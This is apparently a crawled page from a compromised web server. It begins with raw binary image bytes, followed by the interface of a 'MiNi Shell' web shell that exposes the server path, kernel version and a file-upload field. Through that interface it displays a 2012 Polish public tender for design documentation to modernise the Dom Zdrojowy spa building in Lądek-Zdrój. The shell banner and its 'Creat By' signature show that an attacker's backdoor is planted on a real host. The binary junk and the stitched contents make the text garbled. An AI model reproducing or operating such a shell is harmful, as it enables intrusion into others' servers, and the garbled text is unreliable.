JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121115/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20121115/242049-N-2012.html

<p class="kh_header"><b>Lądek-Zdrój: Opracowanie koncepcji i wykonanie dokumentacji projektowej robót modernizacyjnych Domu Zdrojowego - Regionalne Centrum Konferencyjno - Kulturalne w Lądku Zdroju wraz z pełnieniem nadzoru autorskiego</b><br>
<b>Numer ogłoszenia: 242049 - 2012; data zamieszczenia: 15.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uzdrowisko Lądek-Długopole S.A. , ul. Wolności 4, 57-540 Lądek-Zdrój, woj. dolnośląskie, tel. 74 8 115 470, faks 74 8 115 470.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.uzdrowisko-ladek.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka Akcyjna Skarbu Państwa- Podmiot Leczniczy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie koncepcji i wykonanie dokumentacji projektowej robót modernizacyjnych Domu Zdrojowego - Regionalne Centrum Konferencyjno - Kulturalne w Lądku Zdroju wraz z pełnieniem nadzoru autorskiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1) Przedmiotem zamówienia jest: Opracowanie koncepcji i wykonanie dokumentacji projektowej robót modernizacyjnych Domu Zdrojowego - Regionalne Centrum Konferencyjno - Kulturalne w Lądku Zdroju wraz z pełnieniem nadzoru autorskiego.
2) Zakres opracowania obejmuje:
a) koncepcję architektoniczną modernizacji budynku (przebudowa ) Domu Zdrojowego przy ul. Orlej 7 w Lądku Zdroju z przeznaczeniem na Regionalne Centrum Konferencyjno Kulturalne oraz koncepcja zagospodarowania działek 343/1 /AM-10/ obręb Stary Zdrój i 343/2. 
Należy przewidzieć następujące funkcje :
-sala kinowo - teatralną (powiększenie),
-dwie sale konferencyjne z uzupełniającą funkcją gastronomiczną,
-salonik recepcyjny,
-pijalnia wody mineralnej,
-apartamenty mieszkalne,
- gastronomia,
-biuro kierownika obiektu,
-pomieszczenie związane z gromadzeniem dokumentów i eksponatów związanych z historią uzdrowiska,
- inne pomieszczenia niezbędne do funkcjonowania obiektu.
b) Projekt budowlany i wykonawczy zagospodarowania terenu działka 343/1  w tym projekt budowlany nawierzchni przed budynkiem.
c) Projekt budowlany i wykonawczy  architektura w zakresie:
- modernizacja i ewentualna przebudowa wnętrz (zmiana sposobu użytkowania),
- wymiana stolarki okiennej i drzwiowej,
- docieplenie dachów, stropów i ścian,
- izolacja przeciwwilgociowa murów zewnętrznych i wewnętrznych,
- dachy,
- kolorystyka elewacji,
- projekt wykonawczy widowni w sali kinowej (powiększenie),
d) Projekt budowlany i wykonawczy  instalacje wodne, kanalizacyjne, hydrantowe.
e) Projekt budowlany i wykonawczy  instalacje centralnego ogrzewania, wentylacji, klimatyzacji, dostosowanie kotłowni.
f) Projekt budowlany i wykonawczy  instalacje elektryczne:
-wymiana instalacji ogólnego oświetlenia, gniazd jedno i trójfazowych we wszystkich pomieszczeniach.
g) Projekt  wykonawczy  instalacje elektryczne:
-system oświetlenia sceny i widowni w sali kinowo - teatralnej,
-oświetlenie awaryjne,
-system sygnalizacji pożaru,
-systemy nagłośnienia sal konferencyjnych.
h)projekt wykonawczy wewnętrznej sieci telefonicznej oraz internetowej.
3) Wykonawca jest zobowiązany do:
a) Uzyskania wszelkich niezbędnych  opinii i uzgodnień koniecznych  do otrzymania decyzji o pozwoleniu na budowę,
b) sporządzenia przedmiaru robót - zestawienia przewidzianych (wszystkich niezbędnych do prawidłowego  funkcjonowania obiektu) do wykonania robót w kolejności technologicznej ich wykonania wraz ze szczegółowym opisem, miejscem wykonania oraz z wyliczeniem i zestawieniem ilości jednostki miar robót podstawowych oraz wskazaniem podstaw do ustalenia cen jednostkowych robót lub jednostkowych nakładów rzeczowych,
c) sporządzenia kosztorysu inwestorskiego (obejmującego  wszystkie niezbędne roboty do prawidłowego  funkcjonowania obiektu ) zgodnie z obowiązującymi  przepisami,
d) opracowanie specyfikacji technicznych wykonania i odbioru robót budowlanych,
3.1. W zakres wykonania przedmiotu niniejszego postępowania wchodzi m.in. opracowanie:
a) koncepcji w 2 egzemplarzach oraz w wersji elektronicznej 1 egzemplarz; 
b) projektu budowlanego (z podziałem na branże) i projektu wykonawczego oraz harmonogramu rzeczowo - finansowego:
- 4 kpl., format projektu A-4 (po złożeniu) oprawiony w okładkę uniemożliwiającą dekompletację projektu, 
- 2 egzemplarze na płycie CD w formacie oprogramowania, w jakim wykonano projekty i w formacie pdf , 
-  2 egz. harmonogramu rzeczowo- finansowego (1egz w formie elektronicznej).
c)  przedmiar robót (z podziałem na branże): 
  3 kpl. format projektu A-4 oprawiony w okładkę uniemożliwiającą dekompletację projektu, 
  2 egz. na płycie CD w formacie oprogramowania w jakim wykonano projekt i w formacie pdf, 
d) specyfikacji technicznych wykonania i odbioru robót budowlanych (z podziałem na branże) 
  2 egz., format specyfikacji A-4 oprawiony w okładkę uniemożliwiającą dekompletację specyfikacji, 
  1 egz., na płycie CD w formacie oprogramowania, w jakim wykonano specyfikację i w formacie pdf,
e) kosztorysów inwestorskich z podziałem na branże i etapy wraz ze zbiorczym zestawieniem kwot: 
  3 egz. format kosztorysów A-4 oprawiony w okładkę uniemożliwiającą dekompletację kosztorysów, 
   2 egz. na płycie CD w formacie oprogramowania, w jakim wykonano kosztorysy i w formacie PDF.
f) konsultowania z Zamawiającym w toku przygotowywania ww. opracowań.

4) Informacje dodatkowe:
a) Powierzchnia użytkowa istniejącego obiektu: 3180m2
Kubatura: 24909m3
Powierzchnia zabudowy: 1927,7m2
Powierzchnia działki: 343/1     3218m2
Powierzchnia działki: 343/2     1926m2
Obiekt wpisany do rejestru zabytków.
b) Zamawiający posiada inwentaryzacje budowlaną w formie papierowej oraz w formie elektronicznej skan wersji papierowej ( pliki z rozszerzeniem tif.).Dostępna na wniosek Wykonawcy w siedzibie Zamawiającego.
c) Do budynku doprowadzona jest woda, budynek podłączony jest do kanalizacji  Miejskiej (posiadamy podpisaną umowę na dostawę wody i odbiór ścieków).  Zamawiający posiada podpisaną umowę na dostawę gazu do celów grzewczych.
d) Projekt nie przewiduje aranżacji wnętrz.
e) Miasto Lądek-Zdrój posiada plan zagospodarowania przestrzennego. Plan  dostępny na stronie Gminy Lądek-Zdrój. Zamawiający nie posiada decyzji o warunkach zabudowy.
f) Kotłownia w budynku jest opalana gazem. Moc zainstalowanych kotłów 690kW.
g) Obiekt podlega ochronie konserwatorskiej.
5) Przedmiot zamówienia należy wykonać zgodnie z obowiązującymi przepisami prawa oraz normami stosowanymi w budownictwie, w tym m. in. zgodnie z: 
a) Rozporządzenie Ministra Transportu, Budownictwa i Gospodarki Morskiej z dnia 25 kwietnia 2012 r. w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz. U. nr 0, poz. 462 ze zm.), 
b) Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U nr 202, poz. 2072 ze zm.), 
c) Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. w spra?wie określenia metod i podstaw sporządzenia kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz. U nr 130, poz. 1389). 
6) Opisywanie proponowanych materiałów i urządzeń (w opisie, na rysunkach, w kosztorysach, przedmiarach) za pomocą parametrów, cech technicznych, tzn. bez wskazywania znaków towarowych, patentów lub pochodzenia. Jeżeli nie będzie to możliwe i jedyną możliwością będzie podanie nazwy materiału lub urządzenia wykonawca zobowiązany jest do podania co najmniej dwóch producentów materiałów lub urządzeń oraz użycie sformułowania lub równoważny. Pod pojęciem parametry rozumie się funkcjonalność, przeznaczenie, kolorystykę, strukturę, rodzaj materiału, kształt, wielkość, bezpieczeństwo i wytrzymałość oraz pozostałe parametry przypisane poszczególnym materiałom i urządzeniom w dokumentacji projektowej oraz w szczegółowej specyfikacji technicznej.                                                    
7) Zadanie będzie realizowane w 4 etapach:
1) opracowanie koncepcji,
2) opracowanie projektu budowlanego, przedmiaru robót, kosztorysu i specyfikacji technicznych wykonania i odbioru robót budowlanych i harmonogramu rzeczowo- finansowego;
3)  opracowanie projektu wykonawczego;
4) pełnienie nadzoru autorskiego, które będzie realizowane na podstawie warunków określonych w nn. postępowaniu, ale na podstawie odrębnej umowy, zawartej przed rozpoczęciem robót budowlanych.
Zakres zamówienienia zawiera się w kwocie poniżej progów ustalonych na podstawie art. 11 ust. 8 ustawy z dnia 29 stycznia 2004r. Prawo zamówień
publicznych ( tekst jednolity Dz.U.2010r., Nr 113, poz. 759 z późn. zm. zwanej dalej Pzp).</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6, 71.24.40.00-0, 71.24.70.00-1, 71.24.80.00-8, 71.32.00.00-7, 71.42.00.00-8, 71.25.00.00-5, 74.22.21.00-2, 74.23.20.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.03.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w wysokości: 3 000,00 zł,
słownie: trzy tysiące złotych.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku Zamawiający uzna przedłożenie oświadczenia o posiadaniu uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania - wg zał. nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku Zamawiający uzna wykonanie w zakresie niezbędnym do wykazania spełniania warunku wiedzy i  doświadczenia w okresie ostatnich trzech lat przed upływem  terminu składania ofert, a jeżeli okres  prowadzenia działalności jest krótszy - w tym  okresie co najmniej trzech zamówień polegających na wykonaniu trzech dokumentacji projektowych dotyczących budowy lub przebudowy (zgodnie z definicjami Prawo budowlane) z których:
a) co najmniej jedna obejmuje co najmniej jeden obiekt budowlany użyteczności publicznej spełniający warunki: powierzchnia użytkowa nie mniej niż 2000m2, kubatura nie mniej niż 14 000m3,stanowiący obiekt zabytkowy wpisany do rejestru zabytków wraz z załączeniem dokumentu   potwierdzającego, że ta usługa została wykonana lub jest  wykonywana należycie wg zał. nr 5 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku Zamawiający uzna przedłożenie oświadczenia o posiadaniu potencjału technicznego pozwalającego na realizację niniejszego zamówienia wg zał. nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku Zamawiający uzna wykazanie się przez Wykonawcę dysponowaniem na czas realizacji zamówienia:
a) Osobą, posiadającą uprawnienia do projektowania w specjalności architektonicznej umożliwiającej zrealizowanie przedmiotowego zadania oraz doświadczenie w zaprojektowaniu co najmniej jednego obiektu spełniającego warunek opisany w rozdz. XII pkt. 1.2 a) Specyfikacji Istotnych Warunków Zamówienia, 
b)	Osobą,  posiadającą uprawnienia do projektowania w specjalności konstrukcyjno-budowlanej umożliwiającej zrealizowanie przedmiotowego zadania, 
c)	Osobą, posiadającą uprawnienia do projektowania w specjalności instalacyjnej w zakresie instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych, umożliwiającej zrealizowanie przedmiotowego zadania, 
d)	Osobą, posiadającą uprawnienia do projektowania w specjalności instalacyjnej w zakresie instalacji i urządzeń elektrycznych i elektroenerge?tycznej, umożliwiającej zrealizowanie przedmiotowego zadania.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku Zamawiający uzna przedłożenie oświadczenia o znajdowaniu się sytuacji ekonomicznej i finansowej pozwalającej na wykonanie zamówienia wg zał. nr 2 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony i podpisany formularz ofertowy - wg zał. nr 1, 
2. Dokument lub pełnomocnictwo, z których wynika uprawnienie osoby(osób) do składania oświadczeń woli i reprezentowania Wykonawcy, jeżeli to prawo nie wynika z właściwego rejestru. W takiej sytuacji dokument
ten lub pełnomocnictwo muszą być integralną częścią oferty,
3. Dowód wniesienia wadium.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, chyba że zmiana będzie dotyczyła następujących zdarzeń: 1. Wystąpienia
zmian powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu
umowy. 2. Wyniknięcia rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie, których nie
można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie
umowy w celu jednoznacznej interpretacji jej zapisów przez strony. 3. Wystąpienia konieczności zmiany
osób wskazanych w ofercie (śmierć, choroba, ustania stosunku pracy lub inne zdarzenia losowe lub inne
przyczyny niezależne od wykonawcy) przy pomocy, których wykonawca realizuje przedmiot umowy.
Przedmiotowa zmiana jest możliwa pod warunkiem zaproponowania innych osób, spełniających na dzień
składania ofert, warunki określone przez zamawiającego w SIWZ. 4. Zmiany podwykonawcy, który zgodnie
z art. 26 ust. 2b Pzp będzie podmiotem udostępniającym zasoby niezbędne do realizacji zamówienia. W
takim przypadku wykonawca jest zobowiązany zaproponować innego podwykonawcę spełniającego na
dzień składania ofert warunki określone przez zamawiającego w SIWZ wraz z załączeniem wszystkich
wymaganych oświadczeń i dokumentów określonych w rozdz. XIII SIWZ. 5. Zmiany podwykonawcy, o
którym mowa w art. 36 ust. 4 Pzp, pod warunkiem spełnienia warunków określonych w § 10 nn. umowy. 6.
Wystąpienia konieczności zmiany osób (śmierć, choroba, ustania stosunku pracy lub inne zdarzenia
losowe lub inne przyczyny niezależne od zamawiającego), przy pomocy których zamawiający realizuje
przedmiot umowy. 7. Wystąpienia konieczności zmian osób wykonawcy, w przypadku gdy zamawiający
uzna, że osoby te nie wykonują należycie swoich obowiązków. Wykonawca obowiązany jest dokonać
zmiany tych osób, na inne spełniające na dzień składania ofert warunki określone w SIWZ, w terminie nie
dłuższym niż 14 dni od daty złożenia wniosku zamawiającego. 8. Wystąpienia konieczności wprowadzenia
zmian w harmonogramie realizacji przedmiotu umowy poprzez: przesunięcie w czasie, uszczegółowienie
spowodowane obiektywnymi czynnikami, niezależnymi od wykonawcy, uniemożliwiającymi realizację
przedmiotu umowy zgodnie z pierwotną wersją harmonogramu. 9. Zmiana terminu realizacji przedmiotu
umowy z przyczyn niezależnych od wykonawcy, a także z np. wystąpienia zwłoki w wydaniu przez organy
administracji lub inne podmioty wymaganych decyzji, zezwoleń. 10. Wystąpienia konieczności
wprowadzenia zmian spowodowanych następującymi okolicznościami: a) siła wyższa uniemożliwiająca
wykonanie przedmiotu umowy zgodnie ze szczegółowym opisem, b) zmiana danych związanych z obsługą
administracyjno-organizacyjną umowy (np. zmiana numeru rachunku bankowego), c) zmiany danych
teleadresowych, d) zmiana obowiązującej stawki VAT, e) rezygnacja przez zamawiającego z realizacji
części przedmiotu umowy. 11. W przypadku wystąpienia któregokolwiek ze zdarzeń wymienionych w ust. 1
do 10 termin realizacji przedmiotu umowy może ulec odpowiedniemu przedłużeniu, o czas niezbędny do
zakończenia wykonywania jej przedmiotu w sposób należyty, nie dłużej jednak niż o okres trwania tych
okoliczności. 12. Pozostałe zmiany określone w umowie. 13. Wszelkie zmiany do niniejszej umowy
wymagają pisemnego aneksu podpisanego przez strony.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.uzdrowisko-ladek.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Uzdrowisko Lądek-Długopole S.A. ul. Wolności 4 57-540 Lądek Zdrój, pokój nr 4, Dział Zamówień Publicznych i Zaopatrzenia..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.11.2012 godzina 11:00, miejsce: Uzdrowisko Lądek-Długopole S.A. ul. Wolności 4 57-540 Lądek Zdrój, pokój nr 105,
Sekretariat..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com